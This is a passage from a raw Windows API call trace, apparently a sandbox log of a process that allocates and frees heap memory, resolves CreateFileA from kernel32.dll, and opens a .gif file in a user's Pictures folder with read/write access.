returned 0x8e1960 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd5b8 [0189.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd5b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.423] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0189.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd5b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.423] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0189.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x55) returned 0x8c4a48 [0189.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", cchWideChar=85, lpMultiByteStr=0x8c4a48, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpUsedDefaultChar=0x0) returned 85 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.424] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\lu ye0otm8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=85, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0189.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaa) returned 0x8e6cd8 [0189.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=85, lpWideCharStr=0x8e6cd8, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif") returned 85 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.427] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.429] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0189.429] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.430] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, 